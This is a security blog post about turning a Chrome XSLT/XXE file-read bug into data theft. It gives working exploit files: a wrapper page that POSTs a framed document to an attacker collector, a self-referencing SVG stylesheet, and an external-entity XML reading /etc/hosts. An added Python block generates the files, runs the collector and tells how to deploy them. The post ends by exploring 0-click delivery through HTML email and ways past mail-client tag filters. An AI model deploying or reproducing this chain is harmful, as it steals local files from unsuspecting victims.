azraelxuemo's Studio.

Chrome arbitrary file read -> exfiltration

2023/11/17

https://bugs.chromium.org/p/chromium/issues/detail?id=1458911
With IM clients such as WeChat and DingTalk, the page the victim opens after clicking the link renders only on their side; the attacker never sees what the file read returned. Is there a way around that? Yes: let JavaScript on the page carry the result out to a server we control.

How the three files below fit together: the wrapper page embeds js.svg in an iframe. js.svg carries an xml-stylesheet PI whose href is "?#", i.e. the file itself, so Chrome applies it as an XSLT stylesheet to its own content. Inside that stylesheet, document() loads evil.php, an XML document whose DOCTYPE declares an external entity pointing at file:///etc/hosts, and copies the result into an <xmp> element in the rendered SVG. Once the iframe has loaded, the script on the wrapper page reads the frame's document (same origin as the wrapper) and POSTs it to the collector on port 8000.

<html>
<body>
<!-- js.svg is served from the same origin as this page, so its DOM is readable from here -->
<iframe id="test" src="http://ip/js.svg">
</iframe>
<script>
window.onload = function(){
    // After the iframe has loaded, its document holds the XSLT output,
    // i.e. the contents of the file read on the victim's machine
    var content = window.top.document.getElementById("test").contentWindow.document;
    var httpRequest = new XMLHttpRequest();
    var url = "http://ip:8000/";
    httpRequest.open("POST", url, true);
    // A urlencoded POST needs no CORS preflight, so the body reaches the
    // collector even though this page cannot read the cross-origin response
    httpRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    // send() accepts a Document and serializes it before transmission
    httpRequest.send(content);
}
</script>
</body>
</html>
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="?#"?>
<!-- href="?#" resolves to this very file, so Chrome applies it as an XSLT stylesheet to itself -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<!-- document() fetches evil.php; its external entity is expanded and the result is copied into <xmp> -->
<xsl:template match="/">

<svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg">
<foreignObject class="node" font-size="18" width="100%" height="100%">
<body xmlns="http://www.w3.org/1999/xhtml">
<xmp><xsl:copy-of select="document('http://ip/evil.php')"/></xmp>
</body>
</foreignObject>
</svg>

</xsl:template>
</xsl:stylesheet>
<?xml-stylesheet type="text/xml"?>
<!DOCTYPE p [
<!ENTITY hosts SYSTEM "file:///etc/hosts">
]>
<!-- served as evil.php; the entity is expanded when the stylesheet's document() call loads this file -->
<p>&hosts;</p>
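The attacker side of this chain, written out as an added example (it is not code from the original post): functions that generate the three files served from the attacker host (the wrapper page, the self-referencing SVG/XSLT stylesheet and the XML with the external entity) with the attacker host, collector address and target path as parameters in place of the post's "ip" placeholders, plus the collector that the wrapper page POSTs to, which the post leaves unwritten. The sample exfiltrated body used by the round-trip demo is constructed, standing in for what the victim's browser would send.

```python
"""Attacker-side tooling for the Chrome file-read -> exfiltration chain.

Added example, not code from the original post. Host names, the collector
port and the target path are parameters replacing the post's "ip" placeholders.
"""
import threading
import urllib.request
import xml.etree.ElementTree as ET
from http.server import BaseHTTPRequestHandler, HTTPServer


def build_entity_doc(target: str = "file:///etc/hosts") -> str:
    """Content served as evil.php: an external entity pointing at the target
    file, expanded when the stylesheet's document() call loads this XML."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE p [\n"
        f'<!ENTITY data SYSTEM "{target}">\n'
        "]>\n"
        "<p>&data;</p>\n"
    )


def build_stylesheet(attacker: str) -> str:
    """js.svg: the xml-stylesheet PI with href="?#" makes the file its own XSLT
    stylesheet; the template emits an SVG whose <xmp> holds the loaded XML."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<?xml-stylesheet type="text/xsl" href="?#"?>\n'
        '<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">\n'
        '<xsl:template match="/">\n'
        '<svg width="1000%" height="1000%" version="1.1" xmlns="http://www.w3.org/2000/svg">\n'
        '<foreignObject width="100%" height="100%">\n'
        '<body xmlns="http://www.w3.org/1999/xhtml">\n'
        f"<xmp><xsl:copy-of select=\"document('http://{attacker}/evil.php')\"/></xmp>\n"
        "</body>\n</foreignObject>\n</svg>\n"
        "</xsl:template>\n</xsl:stylesheet>\n"
    )


def build_page(attacker: str, collector: str) -> str:
    """Wrapper page: frames js.svg (same origin), then serializes the frame's
    document, which now carries the file contents, and POSTs it to the collector."""
    return f"""<html>
<body>
<iframe id="test" src="http://{attacker}/js.svg"></iframe>
<script>
window.onload = function () {{
  var doc = document.getElementById("test").contentWindow.document;
  var body = new XMLSerializer().serializeToString(doc);
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http://{collector}/", true);
  // urlencoded is a CORS "simple" content type: no preflight, so the POST is
  // delivered even though this page cannot read the response.
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.send(body);
}};
</script>
</body>
</html>
"""


def is_wellformed(xml_text: str) -> bool:
    """Sanity-check a generated stylesheet before serving it: a typo in the
    XSLT yields a blank frame on the victim's side with nothing to debug."""
    try:
        ET.fromstring(xml_text.encode("utf-8"))
        return True
    except ET.ParseError:
        return False


class Collector(BaseHTTPRequestHandler):
    """Records every POSTed body on the server object."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        self.server.received.append(self.rfile.read(length))
        # Nothing useful to send back: the cross-origin page cannot read the
        # response anyway, but the request body has already arrived.
        self.send_response(204)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # keep the demo quiet; real use would log to a file


def start_collector(host: str = "127.0.0.1", port: int = 0) -> HTTPServer:
    """Run the collector in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), Collector)
    server.received = []
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


# Constructed stand-in for what the victim's browser would send: the serialized
# frame document with the hosts file expanded inside <xmp>.
SAMPLE_EXFIL = b"<xmp>127.0.0.1 localhost\n::1 localhost</xmp>"


def demo_roundtrip(body: bytes = SAMPLE_EXFIL) -> bytes:
    """Start a local collector, POST a body to it the way the wrapper page
    does, shut it down and return what was recorded."""
    server = start_collector()
    port = server.server_address[1]
    req = urllib.request.Request(
        f"http://127.0.0.1:{port}/", data=body, method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req) as resp:
        assert resp.status == 204
    server.shutdown()
    server.server_close()
    return server.received[-1]
```

In real use, write the three strings out as index.html, js.svg and evil.php on the attacker web server (evil.php must be returned with an XML content type), start the collector on the port the wrapper page names, and wait for the POST.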

Result

[screenshot: 2023-11-17 15.59.25]

Further ideas

WeChat and DingTalk still need the user to click. Can this be made 0-click? Email is a good candidate:
mail clients can also render messages with the Chrome engine, and email supports HTML.

import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart


def send_email(subject, message, from_email, to_email, password):
    # Build the message container
    msg = MIMEMultipart()
    msg['From'] = from_email
    msg['To'] = to_email
    msg['Subject'] = subject

    # Attach the HTML body
    msg.attach(MIMEText(message, 'html'))

    # Send it
    try:
        server = smtplib.SMTP('smtp.gmail.com', 587)  # SMTP server address and port
        server.ehlo()
        server.starttls()  # upgrade the connection to TLS
        server.login(from_email, password)  # log in to the mailbox
        server.send_message(msg)  # send the message
        server.quit()  # disconnect from the server
        print("Mail sent")
    except Exception as e:
        print("Sending failed:", str(e))


# Sender and recipient details
from_email = ''
to_email = ''
password = ''

# Send a test message
subject = 'Test mail'

message = """
<html>
<body>
<h1>asda</h1>
<p>asda</p>
</body>
</html>"""
send_email(subject, message, from_email, to_email, password)

It looks like iframe, meta, object, embed and similar tags are filtered here, or perhaps a whitelist is enforced. Can some other tag be used to load the payload?
